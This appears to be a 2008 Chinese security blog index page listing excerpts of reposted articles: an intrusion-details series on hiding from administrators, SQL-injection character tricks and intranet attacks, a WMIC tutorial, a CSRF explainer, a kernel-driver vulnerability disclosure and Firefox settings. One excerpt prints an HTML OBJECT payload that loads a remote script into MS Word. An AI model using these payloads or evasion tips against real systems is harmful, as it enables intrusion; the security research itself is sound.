分类 ‘技术文章’ 下的日志

我在入侵过程中注意到的细节(三)

2008/05/27 15:20 | 鬼仔 | 技术文章 | 消灭0回复

作者:lcx
来源:vbs小铺

《黑客手册200803》
我在入侵过程中注意到的细节之三
lcx
前两期中的专栏中,针对细节入侵这一专题,我分别写了我在内网和注入中注意到的一些细节。其实入侵过程中,有时候难免会与管理员面对面,如何更好的隐蔽自己也是很重要的,一旦不注意,入侵工作往往前功尽弃。这期专栏中,我就如何隐蔽自己所做的一些工作,所注意到的细节来写一下。
阅读全文 »

Tags: , ,

我在入侵过程中注意到的细节(二)

2008/05/27 15:19 | 鬼仔 | 技术文章 | 消灭0回复

作者:lcx
来源:vbs小铺

《黑客手册200802》
我在入侵过程中注意到的细节(二)
lcx

上期我写的基本都是在入侵内网过程中要注意到的细节,不过现在流行的毕竟是注入了。现在常规注入针对的也就是asp、php、jsp、cfm、 cgi等的动态脚本。针对各种脚本的话,如果注意一些细节,像构造特殊字符,也会起到很奇妙的作用。像最早的%5c暴库、%00截断都是轰动一时的漏洞。这些漏洞被发现,无非是发现都对脚本语言的一些细节的重视。那么这一期我就来讲一下我会在注入过程中注意到的一些细节,主要是讲一些特殊符号了。
阅读全文 »

Tags: , ,

我在入侵过程中注意到的细节(一)

2008/05/27 15:17 | 鬼仔 | 技术文章 | 消灭0回复

作者:lcx
来源:vbs小铺

《黑客手册200801》
我在入侵过程中注意到的细节(一)
lcx

细节决定成败,不但对于写程序、渗透入侵甚至人生都是如此。谈人生就有点深奥了,还是来谈谈入侵吧。记得很久前有一位同事,注入的时候,在sa权限什么命令都能执行的情况下竟然入侵花费了三天左右的时间,为什么呢?这是因为他在NBSI下输了个time命令,想看下服务器的时间,结果命令无法应答,注入点宕在哪儿了,再也没办法执行其它命令了,直到服务器重启。有的写的不好的木马,如果执行time命令也会自动退出。如果注意到了这个细节的话,最好的执行办法就是time /t。
这一期我不谈注入,针对我在内网入侵的经验,来谈一下细节吧。
阅读全文 »

Tags: , ,

批处理的api–WMIC学习体会

2008/05/27 15:10 | 鬼仔 | 技术文章 | 3 个回复

作者:lcx
来源:vbs小铺

给黑手专栏里写的文章

批处理的api–WMIC学习体会
lcx

上期的专栏里,NP给大家写了一篇很精彩也很有实际应用效果的批处理教程。这期,我给大家讲一下最近我学习wmic的体会。在这篇文章里也许你看不 到很多奇特有用的的实际例程,但是呢,授人以鱼不如授人以渔,希望我的文章能让你通俗易懂的了解一些wmic的基本知识,可以有一个学习的兴趣,让自己继 续深研一下wmic。
阅读全文 »

Tags: , ,

对MS word javascript execution的一些测试

2008/05/23 23:43 | 鬼仔 | 技术文章 | 消灭0回复

作者:余弦
来源:0×37 Security

Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »

Tags: , ,

CSRF: 不要低估了我的危害和攻击能力

2008/05/23 15:31 | 鬼仔 | 技术文章 | 7 个回复

作者:iceskysl
来源:IceskYsl@1sters!

CSRF这种攻击方式虽然提出来很久(在2006年的时候就有了)了,但是这个沉睡的攻击巨人直到前不久才逐渐走入我们的视线,到底CSRF是啥,危害到底有多大?常见的利用方式是如何的,今天作为“安全相关 | Security”分类的第一篇文章,我按照自己的理解告诉你,不要低估了CSRF危害性和攻击能力。

一、什么是CSRF
先看看CSRF的原文说明,如下:

Cross Site Reference Forgery works by including malicious code or a link in a page that accesses a web application that the user is believed to have authenticated. If the session for that web application has not timed out, an attacker may execute unauthorized commands.

阅读全文 »

Tags: , ,

首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞

2008/05/22 23:29 | 鬼仔 | 技术文章 | 1 个回复

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。
阅读全文 »

Tags: ,

Firefox安全设置

2008/05/21 21:38 | 鬼仔 | 技术文章 | 消灭0回复

鬼仔注:纠正作者一个小错误,noscirpt -> noscript,可能是作者没注意。

作者:王小佛
来源:大能寺

1.修改useragent
FF里输入about:config,添加general.useragent.override
设置成GoogleBot 1.2 (+http://www.google.com/bot.html)
你也可以设置成其他的.
设置成googlebot后访问一些站点受限制,比如yahoo,wiki,gmail.用firefox的插件来切换useragent也可以
阅读全文 »

Tags: